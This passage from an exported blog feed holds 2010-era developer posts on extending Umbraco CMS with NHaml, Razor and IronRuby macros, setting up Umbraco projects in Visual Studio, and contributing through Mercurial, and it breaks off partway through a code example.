Well I decided to do it a funky little way, we’ll actually generate the file(s) as needed for our inline macros:\npublic string Render(MacroModel macro, INode node) { var templateEngine = new TemplateEngine(); templateEngine.Options.TemplateContentProvider = this; CompiledTemplate res; if (string.IsNullOrEmpty(macro.ScriptCode)) { res = templateEngine.Compile(IOHelper.MapPath(SystemDirectories.Python + "/" + macro.ScriptName)); } else { var hash = GetMd5Hash(macro.ScriptCode); var path = IOHelper.MapPath(SystemDirectories.Data + "/" + hash + ".haml"); if (!File.Exists(path)) { using (var writer = new StreamWriter(path)) { writer.Write(macro.ScriptCode); } } res = templateEngine.Compile(path); } using (var output = new StringWriter()) { var instance = res.CreateInstance(); instance.Render(output); return output.ToString(); } } This is adding basic caching into the templates, so it generates a MD5 hash from the code to use as a filename, if it exists in the ‘data’ folder (ie - App_Data) it’ll be used, otherwise a new file is created from it. Now we’ve got a real file which we can pass into the NHaml engine.\nThat’s it, now we’ve got support for:\n<umbraco:Macro runat="server" Language="haml"> .class woo, content! </umbraco:Macro> Supporting currentPage Next on the check list of what our NHaml macro engine requires is the ability to access the currentPage object, and this is a bit trickier. Because Haml is just a markup layer it doesn’t know anything about Umbraco, nor does it know anything about the data that exists. For this we’ve got to create our own Template class which NHaml will use when executing the Haml file.\nFirst off I’m going to do some refactoring to move the NHaml template engine creation into the constructor of our engine:\nprivate readonly TemplateEngine _templateEngine; internal NHamlTemplateEngine() { _templateEngine = new TemplateEngine(); _templateEngine.Options.TemplateContentProvider = this; _templateEngine.Options.TemplateBaseType = typeof(NHamlTemplate); } This is more of a .NET preference of mine to have stuff such as this to be done in the constructor of the object, what you’ll notice is the new line:\n_templateEngine.Options.TemplateBaseType = typeof(NHamlTemplate); This is for our new template class which will have the currentPage object on it:\npublic class NHamlTemplate : Template { public INode currentPage { get; set; } } It’s a pretty simple class which we’ve implemented, and we’ve got a single property on there which we have to set, easy, we just have to update the Render method:\nusing (var output = new StringWriter()) { var instance = (NHamlTemplate)res.CreateInstance(); instance.currentPage = node; instance.Render(output); return output.ToString(); } When we create an instance of our template from the file we can cast it to the custom template class and then assign the property to the actual node for the current page.\nNow we can create a template like this:\n.content #{currentPage.GetProperty("bodyText").Value} But if you run this we’ve got an error, NHaml doesn’t know what the INode object is! 
We need to pass in the assembly to the NHaml engine, so let’s update the constructor:\ninternal NHamlTemplateEngine() { _templateEngine = new TemplateEngine(); _templateEngine.Options.AddReference(typeof(INode).Assembly); _templateEngine.Options.TemplateContentProvider = this; _templateEngine.Options.TemplateBaseType = typeof(NHamlTemplate); } Conclusion So there we go, we’ve got a custom macro engine which runs NHaml and allow you to work against Umbraco data.\nI’ve also pushed the code up to bitbucket too so you can grab a copy of it if you want to see it working.\n", "id": "2010-12-28-nhaml-umbraco-macroengine" }, { "title": "Custom Umbraco Macro Engines", "url": "https://www.aaron-powell.com/posts/2010-12-27-custom-umbraco-macro-engines/", "date": "Mon, 27 Dec 2010 00:00:00 +0000", "tags": [ "umbraco" ], "description": "A quick look at the new abstraction layer on top of the Umbraco Macro Engine in Umbraco Juno", "content": "A new feature coming in Umbraco Juno (4.6) is something that is probably a bit surprising for most people that it has come in after so long, an abstracted macro engine.\nWhat this means is that no longer is there just XSLT, .NET controls, IronRuby, IronPython and Razor, but you’ll be able to write your own macro engine if you want.\nIn this article we’ll look at how to create a new macro engine.\nWhere do you start? Like with a lot of extensibility points in Umbraco it’s actually really quite simple to do what you need, and creating a custom macro engine is no exception, all you have to do is implement a single interface, IMacroEngine from within the cms assembly.\nOn this interface there are only three sections that you need to implement for most operations, the name of it, the extensions it supports and its execution method.\nHere’s a really basic macro engine:\npublic class MyAwesomeMacroEngine : IMacroEngine { public bool Validate(string code, INode currentPage, out string errorMessage) { throw new NotImplementedException(); } public string Execute(MacroModel macro, INode currentPage) { return "Go go awesome macro engine!"; } public string Name { get { return "This is my awesome Macro Engine"; } } public List<string> SupportedExtensions { get { return new List<string> { "awesome" }; } } public Dictionary<string, IMacroGuiRendering> SupportedProperties { get { throw new NotImplementedException(); } } } Now when you go to create a new Script File in the Umbraco admin you’ll have a new option for your own macro engine.\nFurther reading I’ve created a supplementary post to this one which looks at how to create a NHaml based macro engine.\nConclusion Seriously, it’s just that easy to create your own macro engine, obviously you’ll want to do more with the Execute method so that it will interact with the script file that you’ve created, but this should give you a bit of a starting point :).\n", "id": "2010-12-27-custom-umbraco-macro-engines" }, { "title": "2010, a year in review", "url": "https://www.aaron-powell.com/posts/2010-12-24-2010-a-year-in-review/", "date": "Fri, 24 Dec 2010 00:00:00 +0000", "tags": [ "year-review" ], "description": "A look back at what was 2010", "content": "Well it’s about that time of the year, the time when you look back at the year that was… and what a year 2010 has been.\nLast year I said that 2009 was my biggest year professionally, but in reality 2010 trumped it well and truly.\n2010, the year of the conference In 2010 I set a new goal for myself and that was to become more of a figure in the Australian development community, and I 
started this off with a dive into the conference circuit.\nI…\nKicked off with DDD Melbourne where I presented a Beginning Umbraco session I then headed back to Melbourne for Remix (which I just attended :P) Flew to Denmark for CodeGarden 10 to speak about unit testing Returned to Sydney to help organize (and speak at) the first DDD Sydney conference Spoke about Umbraco in the CMS Smackdown for SBTUG Won Amped and went to Tokyo for Web Directions East Spoke about open source content management at CodeCamp OZ Talked about Open Conference Protocol at the Sydney Architecture User Group And wrapped up the year with a lightning talk at SydJs on JavaScript frameworks. Phew, busy conference set, wonder if I can top that next year :P.\nAnother year, another job Last year I was excited about taking a new job with TheFARM Digital and getting to work with Shannon so we could really go crazy with Umbraco development. Well there was some sadness when I announced that I was to be leaving TheFARM to join Readify.\nOpen Source work I spent a lot of time this year working on Open Source projects. Obviously Umbraco has featured highly in this area, with version 5 underway (and helping with the team migrate to Mercurial) a lot of my time was devoted there.\nBut I’ve also worked on a few other smaller projects:\nFunnelWeb A blogging engine targeted at real developers JavaScript tools Ole Slidee WhatKey.Net Examine LINQ to Umbraco Extensions I’ll update this soon :P Dynamic extensions Open Conference Protocol Nice little list I think ;)\nWell that pretty much concludes my 2010 wrap up, in 2011 be sure to look out for me at MIX 11, DDD Sydney and CodeGarden 11 :D\n", "id": "2010-12-24-2010-a-year-in-review" }, { "title": "Using Razor in Umbraco 4", "url": "https://www.aaron-powell.com/posts/2010-12-24-umbraco-4-and-razor/", "date": "Fri, 24 Dec 2010 00:00:00 +0000", "tags": [ "umbraco", "razor" ], "description": "A quick look at how to use the Razor support which is coming with Umbraco Juno (4.6)", "content": "If you’ve been following the development of Umbraco Juno (4.6) you’ll have seen that Niels released an add-in for early Juno builds to which was for working with Razor, the new syntax for ASP.Net development.\nWell here’s something even more exciting, Umbraco Juno no longer requires an add-in, instead it has a out-of-the-box support for working with Razor!\nAWESOME!\nUmbraco <3 Razor So what does the Razor support for Umbraco include? Well basically it allows Razor to be used in the same way that you use the Iron* languages, XSLT or .NET controls… as a macro. This means that you can use Razor just as you would any other language option.\nWorking with Razor in Umbraco So if you want to work with Razor what do you need to do? Well creating a Razor macro is just as nice as if you’re doing any other kind of macro, through the Umbraco UI.\nRazor files live along side the Iron* files in the /python folder (yeah, that’s a hold over from the original DLR engine and changing it would be a breaking change so we have to live with it. 
Note - as Morten pointed out in the comments you can set <add key="umbracoPythonPath" value="~/Razor" /> and use a different path for script files), and you create them like you create any other DLR script file in the Umbraco back office:\n(Yes there’s a spelling error in the beta which I’ve fixed :P)\nNow you can start coding up your Razor macros.\nMy first Razor macro With Razor macros there’s a slightly different way that you go about it: rather than using currentPage as you would with XSLT or an Iron* script, you have a Model property which you work with.\nTo make this a bit nicer as well the Model property is a dynamic object, allowing you to access the properties as if they were actually properties of the model, meaning you can do the following:\n<div id="content">@Model.bodyText</div> That’s how easy it is to access the properties of the Model, no more getProperty("bodyText").Value. And there you have it, a basic Razor macro has been created.\nSomething a bit more advanced Well let’s take it up a notch and make a slightly more advanced macro, say a news listing:\n<div class="news-listing"> @foreach(var page in Model.Children) { <div class="news-item"> <h2><a href="@page.Url" title="@page.Name">@page.Name</a></h2> <h3>Published: @page.articleDate.ToString("dd MMM yyyy")</h3> <p>@page.description</p> </div> } </div> What we’re doing here is looping through each of the children of the current page (the Model), generating a <div> and then creating the HTML structure inside it.\nPost-beta features Just a little note: I’ve added a change to the DynamicNode class (which is used by the dynamic Model object) that allows you to access specific types of children, so you can do this in your Razor file:\n<div class="news-listing"> @foreach(var page in Model.articles) { <div class="news-item"> <h2><a href="@page.Url" title="@page.Name">@page.Name</a></h2> <h3>Published: @page.articleDate.ToString("dd MMM yyyy")</h3> <p>@page.description</p> </div> } </div> In this example my Model has children of the type article (that’s the alias of the DocType) and I’m requesting them all (hence the pluralization). Pretty sweet I think!\nConclusion I’m sure that even the most seasoned XSLT “developer” (I’m looking at you Warren!) will have to admit the Razor syntax is highly readable for people who aren’t .NET developers. And because we’re working with a dynamic object it’s really simple to access the properties as needed.\nThis brings us to the end of our quick look at the Razor support which is coming in Umbraco Juno, and how it’s going to be another great choice for developers.\n", "id": "2010-12-24-umbraco-4-and-razor" }, { "title": "How I develop Umbraco", "url": "https://www.aaron-powell.com/posts/2010-12-22-how-i-developer-umbraco/", "date": "Wed, 22 Dec 2010 00:00:00 +0000", "tags": [ "umbraco" ], "description": "How I do my development of Umbraco web applications.", "content": "Overview In this article I’m going to cover the way that I set up my system for developing against Umbraco. I’m putting this together as everyone seems to have their own flavor of doing development so I thought I’d throw my hat into the arena with yet another setup to give new (and experienced) developers another way to go about it.\nAnd hey, this has worked quite well for me for a while, maybe others can benefit from it ;).\nEnvironment So for this I’m going to be running the following software:\nVisual Studio 2010 I use Cassini as a development web server, not IIS.
I don’t use IIS as it requires (under Vista and 7) that you use an admin account to debug. Since my day-to-day Windows account isn’t an admin (seriously, you don’t need an admin for day-to-day work!) Cassini makes a lot more sense SQL Server Express Although I’m running Windows 7 I’ve used this setup on Windows XP and Vista as well, so don’t fear if you’re running an archaic OS :P.\nSide note: I’m using the Umbraco Juno (4.6) beta release, but again this is a moot point, it works with any Umbraco 4.x instance.\nGetting Umbraco running So once you’ve downloaded Umbraco and extracted it, fire up Visual Studio. First thing I do is create a blank Visual Studio project.\nFor development I use Web Application projects, so create a new empty Web Application (ensuring you’ve got the right version of .NET selected too ;)) using the naming schema of SolutionName.Web:\nOnce I’ve added a Web Application I create the projects required for WebFormsMVP, a Logic and a Services project (from which I then remove the Class1.cs file) and a Test project (omitted from here as it’s not important to the overall post). This will leave you with an empty Visual Studio solution (well, except for a web.config file):\nNow we have to copy all the files, except for the /bin folder, into Visual Studio:\nThere’s already a web.config in the project, so we’ll just replace it with the one that Umbraco supplied us, otherwise none of the config settings that Umbraco needs will be there, and we don’t want that.\nNow that Visual Studio is looking nicely filled out I exclude the following folders from the solution:\ndata install media umbraco umbraco_client I also delete the App_Code folder.\nThere is method to this madness, I copy them across so I can ensure that they are in my project folder when I add it to source control. But the reason that I exclude them is so that Visual Studio won’t include them in the JIT compilation when you fire up the debugger. This is most important with the /umbraco folder, as that contains ASP.Net files; the other folders (data, media, etc) don’t contain files that I want in source control, so that’s why I don’t need them in Visual Studio.\nNow the Solution Explorer looks a bit more useful:\nIt’s almost done, there’s just one more problem, we need to handle the Umbraco assemblies. As you’ll remember we excluded the /bin folder from being copied into Visual Studio. This is because the assemblies are a dynamic feature, so including them into the project directly is a bad idea, also, the /bin folder should never be included in source control!\nSo I close off Visual Studio so I can do some restructuring in Windows, basically I want the following structure in source control:\n/src /UmbracoDemo3.* (where the projects reside) /UmbracoDemo3.sln /lib /umbraco-4.6 Now I copy across all the assemblies into the umbraco-4.6 folder, then upon reopening Visual Studio I add the assemblies as references into the Web project. Now when the project is compiled it will then copy all the assemblies into the local /bin for the web application.
I recommend deleting the App_Global.asax.dll (and the reference to it) as it just becomes a royal pain in the ass when working with WebFormsMVP.\nAny external assemblies which I need to include as a reference to a project that can’t be obtained via NuGet I’ll also put into there.\nNote: You don’t have to reference all of them, there is a subset of assemblies which you need to add and they will pull in the rest but I’ve never really sat down and worked out what ones they are.\nDone, now you can spin up Cassini and then you’re good to install Umbraco and start developing.\nConclusion So that brings us to a finale of how I go about doing Umbraco setup with Visual Studio. Here’s a few notices of things which I didn’t cover in this article but can be useful to know:\nI share databases, since the CI process of Umbraco isn’t exactly great it’s simpler to use a shared database for development I use Visual Studio for pretty much all file editing (css, masterpages, IronRuby, etc), but I create them through the Umbraco UI as it will set up the database records nicely ", "id": "2010-12-22-how-i-developer-umbraco" }, { "title": "SydJs talk about JavaScript Frameworks", "url": "https://www.aaron-powell.com/posts/2010-12-20-sydjs-javascript-frameworks/", "date": "Mon, 20 Dec 2010 00:00:00 +0000", "tags": [ "javascript", "sydjs" ], "description": "Talk given at SydJs on building JavaScript frameworks", "content": "Recently I was invited by the lovely (? :P) people of SydJs to come down as participate in their lightning talks night. I presented on the topic of JavaScript frameworks (although to this day I’m not really sure what my session title was as Craig Sharkie introduced it as something rather random).\nThe basic point of my talk was just to give some pointers to people who are looking to create reusable JavaScript components, resulting in me converting some JavaScript which what running my slides into a small library which anyone can use (links below).\nAll in all I really enjoyed being there, it was my first time down there (not only at SydJs but at a non-.NET user group, the enemy is a bit scary :P) and hopefully they will allow me back in the door in the future!\nHere’s the obligatory links set from the talk:\nSlides Slidee (which was running the slides in the browser) WhatKey.net (source, launch blog) My JavaScript tools (contains the namespace method, mocking frameworks, etc) LINQ in JavaScript ", "id": "2010-12-20-sydjs-javascript-frameworks" }, { "title": "Umbraco & Mercurial - How to contribute", "url": "https://www.aaron-powell.com/posts/2010-12-13-umbraco-and-mercurial-how-to-contribute/", "date": "Mon, 13 Dec 2010 00:00:00 +0000", "tags": [ "umbraco", "mercurial" ], "description": "A quick guide on how to contribute to Umbraco using Mercurial", "content": "Umbraco & Mercurial - How to contributeNow that Umbraco’s source code is being moved away from TFS and into Mercurial (and you’ve read the primer) it will be easier than ever for anyone to provide patches, bug fixes or even potential new features back to the Umbraco core team for review. Although you haven’t had to have TFS access in the past to get the code out and work with it the SVN bridge wasn’t a great way in which you could send patches back to the Umbraco core team, but with Mercurial we hope this will be even easier.\nGet Forked! Something that is very different in the world of DVCS is the idea of forks. Essentially a fork is a copy of the repository which someone has created for their own needs. 
A fork contains a full copy of the source repository but is completely isolated so what you do in your fork is your business, and a fork doesn’t have to be pushed back into the main repository, you may have a fork which you just want to have a small change for your own site needs.\nLet’s assume you found a bug in Umbraco and you want to fix it, here’s what to do:\nYou need to create a fork, so navigate to http://umbraco.codeplex.com/SourceControl/list/changesets and click the Create Fork option Enter a name for the fork and a description and click Save Now you’re done, you have your own copy of the repository which you can clone and edit to your hearts content. Also, this repository is stored on the CodePlex servers, meaning that you’ve now got your own online repository, so your changes can be pushed to CodePlex and accessed anywhere, no more worrying about what’ll happen when your laptop blows up and your personalized version of the Umbraco source code is lost.\nWorking with your fork Note: The following will use the Mercurial command line tools, you can use TortoiseHg if you prefer though, refer to the TortoiseHg doco for the UI interactions :).\nNow that you’ve created your fork, let’s set to work on fixing that bug. To do this we need to do the following steps, clone our fork, update to the right codebase and start working:\nhg cl <url of your fork> hg up Release-4.5.2 (or what ever revision you want to use) Launch Visual Studio That’ it, you’re now working in your own personalized copy of the Umbraco repository.\nMercurial commands to know Just to interrupt I’ll jump in and add a few more commands to your Mercurial toolbox:\nhg addremove (addr) This will add any files to the repository which weren’t previously included and remove any that it can’t find (but thinks it should). You can also us hg add and specify the file(s) explicitly too hg commit (com) This will commit any outstanding changes to your local repository (There’s some useful links from the Umbraco blog for understanding DVCSs) hg push (pus) This will send all change sets since you last pushed up to CodePlex hg status (sta) This lists all the files which have some kind of change, either added, removed, modified or unknown (new files not listed for add) since the last commit hg outgoing (o) Lists all the change sets which will be pushed to CodePlex the next time you do a push hg incoming (inc) Lists all the change sets which will be downloaded when you do a pull hg merge (me) Merges the last change set committed into the local repository with the last change set from the remote repository (generally run after a hg pul). You can merge to a specific change set by adding the -r flag Back to our original programming\nNow that you’ve fixed the bug, what do you do? Well we need to ensure that your code gets back to the core, for that we need to ensure that all files are included in the repository (if you added or removed any), the code is committed and you’ve sent it back to codeplex:\nhg addr hg com -m “Fixing bug #1234. The problem was caused by XYZ so I did ABC and have tested it on my machine under the circumstances outlined in the bug” If you get an error here about your username see below Make sure that you’re providing a useful commit message, fixed is not a useful commit message ;) hg pus You’ll probably have to supply your password at this point You can configure Mercurial to remember your password, I’ll get to that shortly Congratulations, you’ve just done a change and pushed it up to CodePlex! 
This change resides only in your fork at the moment though (this is what i meant by you can do forks which are just for your own needs that are never sent to the core), but you want to see this bug fixed in the core, so what’s next? Well you need to send the core team a pull request. To do this you need to go back to CodePlex and view your forks. On this screen there is a Send Pull Request link, click it, provide some information about why you’re sending the pull request and you’re done.\nHopefully this process is a lot simpler for people to provide changed to Umbraco than the previous patching system :).\nTroubleshoot and advanced tips In an ideal world everything will go as smoothly as outlined, but we don’t live in an ideal world, so let’s have a look at some other things which you may need to know.\nI get an error when committing about my username not being set If this is your first time using Mercurial chances are you haven’t got the environment 100% configured to do changes. One thing that is required when you do a change is that you provide a username (remember, this isn’t integrated with Windows so it wont grab that one). But don’t worry, it’s a very easy problem to fix.\nManually supplying usernames\nWhen you execute a hg com command you can specify the username there, like so: hg com -m "some commit message" -u 'Aaron Powell'.\nSetting a default username for the clone\nIf you’re doing a lot of commits you may want to set the username for this particular repository, to do so navigate into your .hg folder (in the root of the clone) and open the hgrc file (or create it if it doesn’t exist), and add the following section:\n[ui] username = "Aaron Powell" Save the file and now when you do hg com -m "some commit message" the username will be pulled from that file automagically!\nSetting a global username for Windows\nIf you’re using a lot of Mercurial clones you may not want to have to specify your username each time, instead you want something set globally for all of them. To do this you need to edit your global hgrc file. You need to add the section listed above to the global file, which the locations of it listed here: http://www.selenic.com/mercurial/hgrc.5.html.\nStoring your password Each time you push you need to authenticate against the CodePlex servers, but if you’re doing a lot of pushes then it may get annoying to have to type in your password each time (or if you’re like me and don’t know your password it’s even more of a pain!). Luckily it’s easy to have your password automatically included. Navigate into you .hg folder and open the hgrc file. You should have a section like this:\n[paths] default = http://../ This is the URL of your repository, and here you can configure it to automatically include your username & password, change the URL to be like this:\nhttps://username:password@ur.of.my.repository Save the file and now each time you commit your credentials are included :).\nStaying in sync with the core If you’re a really awesome dude who fixes a lot of bugs for us you may find that your fork gets out of sync with the core, but don’t fear, you can keep your fork in sync by pulling from multiple sources. What this allows you to do is define multiple repositories which you want to be able to get updates from (selectively).\nOpen your trusty hgrc file and navigate to the [paths] section. In here you can add multiple paths, each with a different name. 
Most likely your fork will be labeled default, so we’ll add a new one which is the core:\n[paths] default = https://hg01.codeplex.com/forks/slace/my-repository core = https://hg01.codeplex.com/umbraco Now when you do a pull you can specify where you want to pull from:\nhg pull core This will get all the latest change sets form the Umbraco core repository. You can then merge (hg me) them into your local fork and patch against it again!\nConclusion Here we’ve looked at how the move to Mercurial for Umbraco will make life easier for people outside of the Umbraco core team that want to contribute back. Hopefully this more streamlined process will mean that we see more fixes from the community so we can create even better a product :).\n", "id": "2010-12-13-umbraco-and-mercurial-how-to-contribute" }, { "title": "Mercurial 101 as an Umbraco developer", "url": "https://www.aaron-powell.com/posts/2010-12-11-mercurial-101-for-umbraco-developers/", "date": "Sat, 11 Dec 2010 00:00:00 +0000", "tags": [ "umbraco", "mercurial" ], "description": "A Mercurial primer for Umbraco developers", "content": "Mercurial 101 as an Umbraco developerYou may have read the post that the Umbraco codebase is being moved from a CodePlex TFS server to CodePlex Mercurial (link) but what does that mean as an Umbraco community member?\nFirst up, a Mercurial primer While there are fancy GUI tools for working with Mercurial (such as TortoiseHg) I’m going to do a quick run down on what you need to be able to use from the command line to work with Mercurial. Personally I find it easier (and quicker) to work on the command line, but if you’d prefer to learn about TortoiseHg jump over to their doco, or read Shannon’s guide to using TortoiseHg :).\nCommands you need There are three things you need to be able to do if you’re grabbing the code from Mercurial, clone, update and view history: (Note: This is not covering doing changes, just how to get the code and navigate around it)\nhg clone https://hg01.codeplex.com/umbraco This how you get a copy of the codeplex repository onto your machine. This may take a little while, we’ve got a lot of history (sic) in there that you’ll be getting hg update This is how you’ll get to the release that you want to view the code for. Say you want to work with v4.5.2 then you want to do hg update Release-4.5.2 hg serve This is an interesting command as it’ll spin up a webserver (http://localhost:8000 by default) which allows you to view the repository history. You can hit the url in your browser and browse change sets, commits, etc. This is a handy way to find out what you want to update to without having to go to CodePlex A command line tip One of the really nice things about the Mercurial command line tools is that you can use shorthand to execute a command. Basically when you type a command in shorthand Mercurial will try and find the command that matches it, so for example if I was to type hg up Release-4.5.2 Mercurial will see that I’ve typed up and that up only matches the update command.\nIf you don’t supply enough characters, ie: hg c https://hg01.codeplex.com/umbraco then Mercurial will tell you that it doesn’t know what you were trying to execute.\nNamed branches as awesome Anyone who’s tried to bugfix Umbraco or wanted to compile a version themselves will appreciate the pain which the TFS structure was causing (this isn’t a bash at TFS, it wasn’t entirely TFSs fault that it was hard, it was a combination of different factors, so don’t take this as a diss at TFS). 
Now with the migration it should be a whole lot easier.\nSay you find a bug in your 4.5.2 install and you want to try and debug it yourself. Here’s how you’d go about it:\nOpen up your favorite console (cmd.exe, powershell, etc) and navigate to a folder you want to put the Umbraco source Execute: hg cl https://hg01.codeplex.com/umbraco; hg up Release-4.5.2; Open the .sln file in Visual Studio Yes, it’s just that easy! Now you can debug the code to your hearts content.\nConclusion This was just a quick walkt through of how the move to Mercurial with Umbraco is going to make it simpler for developers to interact with the Umbraco source code.\nHappy Hacking :)\n", "id": "2010-12-11-mercurial-101-for-umbraco-developers" }, { "title": "WhatKey.net, a simple way to find JavaScript keycodes", "url": "https://www.aaron-powell.com/posts/2010-12-07-whatkey-net-for-your-javascript-keycode-glory/", "date": "Tue, 07 Dec 2010 00:00:00 +0000", "tags": [ "whatkey", "javascript", "web", "project" ], "description": "An overview of a simple site which helps JavaScript developers working with keyboard events", "content": "Today while preparing a set of slides for an upcoming talk I decided that I wanted to do the slides as a series of web pages, the problem is that I still wanted to be able to use my Logitech clicker. Since it ‘just works’ when I plug it in I figured it was firing some simple keyboard events, but the question is, what keyboard events is it firing?\nI fired up Chrome, opened the JavaScript console and added a body keypress event to capture the keycode. Sweet, got what I needed, but it was a bit of a pain in the ass to do, I just wished there was a simpler way to find it, and what if I need to get them again, I’ve gotta write little handler again.\nIt’s just one of those things that you don’t need all that often, but it’s just a tedious task to get done.\nAs they say, the necessity is the mother of all invention, so I decided to whip up a simple website which anyone can use, available at http://whatkey.net.\nAll you need to do is fire up http://whatkey.net and press the key that you want, this give you the keycode for the keydown event in big letters. If you want to check different keyboard events, like keypress or keyup then you can access them by going to http://whatkey.net/keypress or http://whatkey.net/keyup.\nBest of all this whole application is done in about 20 lines of code (source code is on GitHub), it runs Ruby, using Sinatra and hosted on Heroku.\nHopefully this tool becomes useful to other web developers out there.\n", "id": "2010-12-07-whatkey-net-for-your-javascript-keycode-glory" }, { "title": "Ole Erling appears in NodeJS", "url": "https://www.aaron-powell.com/posts/2010-12-04-ole/", "date": "Sat, 04 Dec 2010 00:00:00 +0000", "tags": [ "umbraco", "nodejs" ], "description": "Having some fun with NodeJS and a crazy Danish dude", "content": "People would probably agree that I’m not the most normal of people when it comes to developing software. Quite often something takes my fancy, and I have a crack at building with it, whether it is a good idea or not.\nRecently there’s been a lot of fuss on Twitter about a Ruby project which has recently gone into v1.0 called Sinatra. It’s got a rather nice syntax if you’re trying to build a quick-fire application, here’s the Hello World example from the site:\nrequire 'sinatra' get '/hi' do "Hello World!" 
end In fact in about 15 minutes I threw together a new site for some quick linking at slace.biz, from which you can jump to /umbraco or get some basic contact info via /me.\nHaving fun with NodeJS It’s no secret that I’m a fan of JavaScript, especially if I want to do something that’s a little… strange.\nSo after playing with Sinatra for a bit I decided “Why can’t I just build it in JavaScript?”. Oh sure, it’s been done before, but reinventing wheels is fun.\nThis isn’t really a serious attempt, it’s just a bit of fun and a bit of a learning experiment, so I decided that taking the piss would be the best way to go about it. To do this I decided to create my own framework, a framework inspired by a Danish ‘musician’ called Ole Erling.\nThe source code is available on my bitbucket, if you want to grab it it’s here.\nDesign of Ole The design of Ole is meant to be a fun one (remember: piss-take!) and you work with it through a fluent API. The first thing that Ole must do is enter the room (well, the file):\nvar ole = require('./src/ole').enters(); Now that Ole is in the room you can get him to do things, such as listen to HTTP events:\nole.hears('GET', '/', function(req, res) { res.end('Hello World!'); }); What I’ve said is that when Ole hears a GET HTTP request on the URL / it will execute a particular function. Ole can hear all four HTTP request modes, GET, POST, PUT and DELETE, it’s up to you how you want to implement them.\nOnce you’ve said what Ole can hear you’d better get him to play his set:\nole.play(); Currently Ole will only play on port 2009 (spot the in-joke there :P) on localhost.\nConclusion As I’ve said, this is a bit of a joke project that I’m working on, currently I’m hanging out to get a beta invite on heroku.com’s NodeJS support, or the no.be beta project, and when I do expect a site running Ole to go live :D.\nPlease feel free to get Ole running a set for you too ;).\n", "id": "2010-12-04-ole" }, { "title": "Creating a menu in Umbraco with IronRuby", "url": "https://www.aaron-powell.com/posts/2010-11-27-umbraco-menu-with-ironruby/", "date": "Sat, 27 Nov 2010 00:00:00 +0000", "tags": [ "umbraco", "ironruby" ], "description": "No more XSLT, DLR for the win", "content": "Recently I’ve been helping a client migrate a number of unmanaged microsites into an Umbraco instance, and since it’s well known that I’m not a fan of XSLT, an alternative was in order. While working at TheFarm I wrote a blog about the different macro options and what we were doing back then.
Since moving on I’ve been wanting to avoid using XSLT at all.\nUmbraco has supported DLR languages like IronPython and IronRuby for quite some time, so I decided to look into it for this new project.\nSo with the help of fellow Readifarian Thomas Johansen we set about doing a migration of the microsites and running IronRuby where possible (Thomas is a Ruby fan so that’s why we’re choosing IronRuby here).\nOne of the most common macros I was still writing in XSLT is a navigation, so lets look at how we can do this with IronRuby.\nNote: With this I’m working on an Umbraco 4.5.2 version of Umbraco, using .NET 3.5\nGetting your script ready One of the nice things about XSLT is that you can load in XSLT extensions, you know that section at the top of your XSLT file which you need specify xmlns:umbraco.library="urn:umbraco.library" and so on, well we need to do a similar thing in IronRuby so we have access to the umbraco.library object.\nBut what’s different here is we just need to open the appropriate objects:\nLibrary = Object.const_get("umbraco").const_get("library") What this is doing is opening the umbraco namespace and then getting the library object from within it (you can chain as many namespaces together as you need to do this too).\nGetting the starting node At the moment our sites are only one level deep so we’re being a bit lazy with the loading of the root most node, but basically we want to find a parent some way. Like an XSLT DLR script are provided with the current page node in the form of a currentPage object, so we’ll grab it from here:\nparent = currentPage.Parent Building our HTML Now that we have our starting node we need to start constructing a navigation, that’s as easy as just writing HTML to the screen:\nputs '<nav><ul id="navigation">' parent.Children.find_all { |c| c.GetProperty("umbracoNaviHide").Value != "1" }.each_with_index do |child, i| puts %Q{ <li class="#{'first' if i == 0}"> <a href="#{Library.NiceUrl(child.Id)}" class="#{'selected' if child.Id == currentPage.Id}" target="_self" title="Go to #{child.Name}">#{child.Name}</a> </li> } end puts '</ul></nav> Here what we’re doing is creating some HTML which is a HTML5 <nav> element that then encloses a <ul> element. What’s primarily of interest in this script section is the loop.\nWe’re doing a few things here, first we’re using the find_all method (you could use a select instead if you want, Ruby has a dozen ways to do the same thing :P). This method we’re doing a filter on the children, ignoring the ones which we want to hide, but you can add what ever conditions you want in there (the c variable is an instance of Node from the Umbraco API). Once we’re got our filtered collection we are then looping through each one using the each_with_index method which provides us again with the instance of a Node and the position in the array (which is i if you’re not following).\nA really cool thing about Ruby is how you can do string formatting, unlike .NET you can put complex logic in your string formatting, which is denoted by the #{ ... 
} syntax, here we’re doing a few things such as:\n#{'first' if i == 0} What this does is return the value first when the if condition is true, and this is how we can put a class on the first item in the navigation.\nWe’re also capable of doing other complex things like\n#{Library.NiceUrl(child.Id)} and getting the URL of the page in-place.\nWrapping it all up Here’s the completed script:\nLibrary = Object.const_get("umbraco").const_get("library") parent = currentPage.Parent puts '<nav><ul id="navigation">' parent.Children.find_all { |c| c.GetProperty("umbracoNaviHide").Value != "1" }.each_with_index do |child, i| puts %Q{ <li class="#{'first' if i == 0}"> <a href="#{Library.NiceUrl(child.Id)}" class="#{'selected' if child.Id == currentPage.Id}" target="_self" title="Go to #{child.Name}">#{child.Name}</a> </li> } end puts '</ul></nav>' That’s a total of 13 lines (including whitespace, which can be condensed to just 7 lines if you change whitespace and HTML formatting) of Ruby code which can build a navigation which will suit a lot of needs. Compare this to the template for NavigationPrototype.xslt which ships with an Umbraco install and is 40 lines (ok, fine it does have comments :P). Not bad methinks, not bad…\nConclusion IronRuby is a great option for writing small macros in Umbraco, and a great alternative to using XSLT. If you’re a developer I strongly recommend you look into the DLR support for your Umbraco projects.\nBonus - making a recursive menu system In the above code we’ve made a simple menu system that has a known starting point, but as I pointed out it’s not great if you want to have a recursive one. Well let’s have a look at what is required to do that.\nRecursively finding a parent The first thing we need to do is work out how to translate this XPath statement (that’s from the template shipped in Umbraco):\n$currentPage/ancestor-or-self::node [@level=$level]/node [string(data [@alias='umbracoNaviHide']) != '1'] into something in Ruby.\nBut there’s a problem, we’re checking against the @level attribute in XSLT, but the Node object in the Umbraco API doesn’t have a Level property! Damn that’s going to make my life harder isn’t it… Well the good news is you can get around this with a bit of trickery. What we’re going to do is work against the Id property… but hang on, we don’t know what the Id is of the node at the level we want, and like hell do I want to hard code that anywhere. Well here’s where the trickery comes in.\nThe Node object has a property on it for the Path, we can use that to fake the level.
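As an aside for the .NET developers following along, the same ‘fake the level from the Path’ trick translated into C# against the nodeFactory Node API would look roughly like this; this is a sketch of my own (not anything shipped with Umbraco), assuming Path is the usual comma-separated string of ancestor IDs:
// Fake the missing Level property by indexing into the comma-separated Path.
// level 2 is the microsite root in this setup; use 1 for a normal single-site install.
private static int GetAncestorIdAtLevel(Node current, int level)
{
    var ids = current.Path.Split(',');
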